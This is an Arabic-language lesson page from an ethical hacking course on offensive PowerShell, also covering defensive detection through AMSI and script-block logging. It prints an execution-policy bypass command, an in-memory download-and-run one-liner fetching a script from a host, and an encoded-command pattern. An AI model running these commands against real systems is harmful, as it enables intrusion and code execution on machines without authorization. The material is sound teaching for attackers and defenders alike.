0Pricing
Ethical Hacking Academy · درس

PowerShell للمهاجمين

PowerShell الهجومي

PowerShell للمهاجمين درس مجاني في Ethical Hacking Academy على CoddyKit. هذا هو الدرس 4 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Ethical Hacking Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.

لماذا PowerShell

يأتي PowerShell مضمّنًا في Windows، ومتكاملًا بعمق مع نظام التشغيل و.NET، ويحظى بثقة المسؤولين. لذلك يُعد أداة مفضلة لأسلوب living-off-the-land لدى المهاجمين - فلا حاجة إلى إسقاط برمجية خبيثة.

يغطي هذا الدرس مفاهيم PowerShell الهجومي التي يجب أن تفهمها لمهاجمة Windows والدفاع عنه.

Cmdlets وخط الأنابيب

أوامر PowerShell هي cmdlets بصيغة Verb-Noun. وتمرّر كائنات غنية، لا نصوصًا فقط، عبر خط الأنابيب، مما يجعل الاستطلاع قويًا.

Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, Id

استطلاع النظام

يستخدم المهاجمون cmdlets المضمّنة لفحص المضيف بسرعة - المستخدمين والخدمات والشبكة والتحديثات.

Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State Listen

سياسة التنفيذ ليست أمانًا

تقيّد سياسة التنفيذ تشغيل ملفات البرامج النصية، لكنها ليست حدًا أمنيًا. إذ يمكن تجاوزها باستخدام العديد من الخيارات البسيطة، لذلك لا ينبغي للمدافعين الاعتماد عليها.

powershell -ExecutionPolicy Bypass -File script.ps1

التنزيل والتشغيل

تجلب تقنية شائعة حمولةً وتُشغّلها في الذاكرة، تاركةً القليل على القرص. ولهذا تكتسب مراقبة الشبكة وAMSI أهمية كبيرة.

IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')

الأوامر المشفّرة بالترميز

يشغّل الخيار -EncodedCommand أوامر PowerShell المرمّزة بـ Base64، ويُستخدم غالبًا لإخفاء الغرض عن الفحص السريع والمرشّحات البسيطة.

يفكّ المدافعون ترميز هذه الأوامر من السجلات لكشف ما تم تشغيله فعليًا.

powershell -EncodedCommand <base64-here>

الأطر الهجومية

تبني حزم الأدوات الناضجة على هذه الأساسيات:

  • PowerSploit / PowerView - استطلاع AD وما بعد الاستغلال.
  • Empire / Covenant - القيادة والتحكم.
  • Nishang - نصوص هجومية.

تتعرف وسائل الحماية الآن على معظمها بدرجة كبيرة من خلال التواقيع.

استطلاع Active Directory

في النطاق، يرسم PowerShell (PowerView أو وحدة AD) المستخدمين والمجموعات وعلاقات الثقة - وهو الأساس للعثور على مسار إلى Domain Admin.

Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'

AMSI والتسجيل

أضافت Microsoft وسائل حماية مخصّصة لمواجهة إساءة استخدام PowerShell:

  • تفحص AMSI (واجهة فحص البرامج الضارة) محتوى البرامج النصية قبل التنفيذ.
  • يسجّل Script Block Logging ما يتم تشغيله.
  • يحدّ Constrained Language Mode من الميزات الخطرة.

يحاول المهاجمون تجاوز AMSI، بينما يراقب المدافعون السجلات.

التحرّي الدفاعي

تتحرّى الفرق الدفاعية عن PowerShell الخبيث بالبحث عن:

  • أوامر مرمّزة أو مموّهة.
  • عمليات جلب عبر الشبكة باستخدام DownloadString / IEX.
  • عمليات أصل غير معتادة (مثل أن يشغّل Office برنامج PowerShell).
  • سجلات كتل البرامج النصية الخاصة بـ AMSI ومعرّف الحدث 4104.

استخدمه بطريقة أخلاقية

هذه التقنيات قوية وترتبط مباشرة بعمليات اختراق حقيقية. لا تشغّلها إلا في مختبرك الخاص أو بتفويض كتابي صريح.

إن ممارسة الجانب الدفاعي - قراءة السجلات ورصد عمليات رصد AMSI - لا تقل قيمة عن ممارسة الجانب الهجومي.

تحقق سريع

قيّم سياسة التنفيذ باعتبارها إجراءً رقابيًا.

مراجعة

استكشفت PowerShell الهجومي:

  • تجعل cmdlets القائمة على الكائنات الاستطلاع قويًا وخفيًا (أسلوب living-off-the-land).
  • التنزيل والتشغيل، والأوامر المرمّزة، وأطر مثل PowerView وEmpire.
  • ليست سياسة التنفيذ وسيلة أمان؛ أما AMSI وتسجيل كتل البرامج النصية فهما وسائل الحماية الفعلية.
  • اعمل دائمًا بطريقة أخلاقية وادرس الجانب الدفاعي.

وبذلك تكتمل دورة Windows Internals.

الأسئلة الشائعة

هل درس «PowerShell للمهاجمين» مجاني؟

نعم — نص درس «PowerShell للمهاجمين» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Ethical Hacking Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.

ماذا ستتعلم في «PowerShell للمهاجمين»؟

PowerShell الهجومي تتمرن على Ethical Hacking Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Ethical Hacking Academy؟

لا تُشترط خبرة سابقة. Ethical Hacking Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 4 من أصل 4.

كم من الوقت يستغرق درس «PowerShell للمهاجمين»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Ethical Hacking Academy هذا؟

نعم. كل درس في Ethical Hacking Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. بنية Windows
  2. السجل
  3. مصادقة Windows
  4. PowerShell للمهاجمين
← العودة إلى Ethical Hacking Academy